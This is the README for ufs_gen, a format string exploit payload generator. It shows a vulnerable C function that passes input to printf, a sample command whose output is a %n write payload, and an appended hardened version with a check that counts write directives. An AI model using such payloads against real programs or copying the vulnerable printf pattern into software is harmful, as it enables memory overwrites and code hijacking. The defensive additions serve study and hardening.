ufs_gen
=======
This software generates a payload that can overwrite an address with the
value of your choice.
The syntax is quite simple. The program needs three parameters to run
correctly:
  stackidx: the number of dwords needed to reach the beginning of your
            buffer (or payload).
  override: the address to overwrite.
  with:     the value to write at the overwritten address.
This software is intended to work with an ELF32 binary built from typical
code, for example:
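    #include <stdio.h>
    #include <string.h>

    int function(const char *payload)
    {
        char buffer[BUFSIZ];

        /* bounded copy, always NUL-terminated */
        strncpy(buffer, payload, sizeof(buffer));
        buffer[sizeof(buffer) - 1] = '\0';
        /* buffer is used as the format string: the call ufs_gen targets */
        printf(buffer);
        return 0;
    }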
Support for ELF64 and other formats is intended but not written yet.
Although the 'addrsize' option can already be used to specify that an
address is not 4 bytes long, it is unlikely to work correctly.
Support for calling printf(payload) directly (i.e. without a temporary
buffer) is also planned.
Example
=======
user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4
D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n
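For reference, the hardened form of the function shown above, together with a check that counts the %n write directives in an input such as the sample output. This is an added example, not part of ufs_gen; the names function_safe and count_write_directives are hypothetical, and the sample string is the directive part of the output above with the leading address bytes left out.

```c
#include <stdio.h>
#include <string.h>

/* Hardened form of the README's function: the untrusted text is passed as
 * data to a constant "%s" format, so directives inside it are never parsed. */
int function_safe(const char *payload)
{
    char buffer[BUFSIZ];

    strncpy(buffer, payload, sizeof(buffer));
    buffer[sizeof(buffer) - 1] = '\0';
    return printf("%s", buffer) < 0 ? -1 : 0;
}

/* Hypothetical helper: count conversions in s that end in 'n' (a write
 * directive), including positional forms such as "%4$n" and length-modified
 * forms such as "%hhn". "%%" is a literal percent sign and is skipped. */
int count_write_directives(const char *s)
{
    int hits = 0;

    while ((s = strchr(s, '%')) != NULL) {
        s++;                                  /* step past '%' */
        if (*s == '%') {                      /* "%%" literal */
            s++;
            continue;
        }
        /* flags, width, precision, positional index ("4$") and '*' */
        while (*s && strchr("0123456789$*.-+ #'", *s))
            s++;
        /* length modifiers */
        while (*s && strchr("hlLqjzt", *s))
            s++;
        if (*s == 'n')
            hits++;
    }
    return hits;
}

int main(void)
{
    /* Directive part of the README's sample output (address bytes omitted). */
    const char *sample = "%120x%4$n%239x%5$n%239x%6$n%239x%7$n";

    printf("write directives: %d\n", count_write_directives(sample));
    return function_safe(sample);   /* prints the text literally */
}
```

Building the original function with -Wformat -Wformat-security (GCC or Clang) also reports the printf(buffer) call at compile time.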
License
=======
This software is free software covered by the GPL license v2. You should
read the COPYING file to understand what is implied.